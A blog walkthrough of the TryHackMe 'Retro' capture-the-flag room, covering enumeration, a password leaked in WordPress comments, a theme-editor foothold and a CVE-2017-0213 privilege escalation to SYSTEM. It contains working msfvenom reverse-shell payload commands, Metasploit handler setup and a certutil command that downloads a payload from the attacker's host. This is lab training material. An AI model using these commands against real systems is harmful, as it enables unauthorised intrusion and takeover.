Drive Off into the Sunset After You Exploit this CVE-2017-0213 Vulnerable Box in Retro CTF

Drive Off into the Sunset After You Exploit this CVE-2017-0213 Vulnerable Box in Retro CTF

This walkthrough will go over the Retro room found on TryHackMe. The objective behind this room is to use a bit of passive recon to find a set of credentials in order to RDP into the box, identify a vulnerability in the Windows COM (CVE-2017-0213), and privesc to NT AUTHORITY\SYSTEM.

Step 1: What's Out There?

nmap -sC -sV -p- -Pn retro.thm --min-rate=1000

Looks like we have a webserver and an RDP session open. Let's check out what the web server can offer us.

A default Microsoft IIS page. We'll use ffuf to enumerate for directories.

Step 2: FFUF

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://retro.thm/FUZZ -fs 703

Nice, we discovered a directory called /retro. Let's go to it.

Step 3: Finding Credentials

We discovered a blog that seems to be run by a username Wade.

After downloading and viewing the Comments RSS data, we discovered text that might be a potential password.

Taking this information and plugging it into the Site Admin link allows us to log in to the WordPress admin panel.

Step 4: Initial Foothold

Based on my experience with getting a reverse shell with WordPress, we would need to modify the 404.php file and inject our generated shell code. We can do this with msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f raw -o retro_shell.php

Now let's start initializing our handler so we can catch the shell once it executes.

  1. msfconsole

  2. use exploit/multi/handler

  3. set payload php/meterpreter/reverse_tcp

  4. set LHOST <ATTACKER_IP>

  5. set LHOST 1337

  6. exploit

From here we want to copy our retro_shell.php code and paste it into 404.php.We can do this by navigating to Appearance > Theme Editor > 404 Template. Delete the content of the 404.php file and paste it into your shell. Should look like this.

Now navigate to the file in your browser (http://retro.thm/retro/wp-content/themes/90s-retro/404.php) and it will drop you into a meterpreter session.

Step 5: Detour

Okay, so for some reason I could not get the meterpreter shell to stabilize with the 404.php route. But, that's alright. Sometimes we have to get creative and approach a problem from a different angle... in the end, we still get the same outcome. Root.

So what I decided to do is RDP into the box with our same credentials and upload a payload, set my handler, and catch it with a stable meterpreter session.

Generate a payload using msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o payload.exe

Start an HTTP Server and transfer it over using certutil.

certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe

Now we want to set up our listener and catch the shell. Same as before with a slight modification.

  1. msfconsole

  2. use exploit/multi/handler

  3. set payload windows/x64/meterpreter/reverse_tcp

  4. set LHOST <ATTACKER_IP>

  5. set LPORT 1337

  6. exploit

Run the payload from the victim box and drop it into a meterpreter session.

Step 6: Privesc

We're going to use the Windows Exploit Suggester (WES) to find a way to elevate our privileges. First, we need to pull the system's information in order to pull this off.

systeminfo > sysinfo.txt

Now we can pull it down to our attack box.

From here we can use WES to find a privesc vector (update database before running:

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2023-08-07-mssb.xls --sysinfo ~/sysinfo.txt --ostext 'windows 10 64-bit' -l

This build of Windows 10 is vulnerable to a Windows COM privesc, CVE-2017-0213. There's a binary that we can use to automate this exploit for us. Let's download it to our attack box and upload it to our victim. Link to binary here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213

Once we get it on our victim box we can run it and then move over to our RDP session and find a new CMD shell spawned with NT AUTHORITY\SYSTEM rights.

Finally...this one was very difficult and time-consuming. I ended up going down multiple rabbit holes and failing at stabilizing shells more times than I'd like to admit. But all-in-all, I can say this box was rewarding and has taught me a lot about Windows privesc. I hope you enjoyed this walkthrough, and as always, Happy Hacking.

Did you find this article valuable?

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!